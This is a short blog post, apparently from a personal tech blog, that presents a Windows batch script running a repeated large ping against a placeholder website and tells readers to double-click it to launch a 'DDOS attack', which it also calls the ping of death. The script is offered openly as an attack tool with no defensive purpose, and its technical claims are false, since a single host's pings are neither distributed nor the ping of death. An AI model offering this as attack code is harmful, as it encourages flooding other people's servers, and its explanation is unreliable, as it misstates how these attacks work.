DDOS attack - Script

Command to do a DDOS attack:

--> This is also called as the ping of death attack

Copy the below script into notepad and save it to .bat file. 

Script:
@echo off
ping -n 2000 -l 500 <www.example.com>

Then double click on bat file, DDOS attack will start 

Comments

Popular posts from this blog

How to configure Zabbix Monitoring tool on Ubuntu

Windows screen auto unlock - Script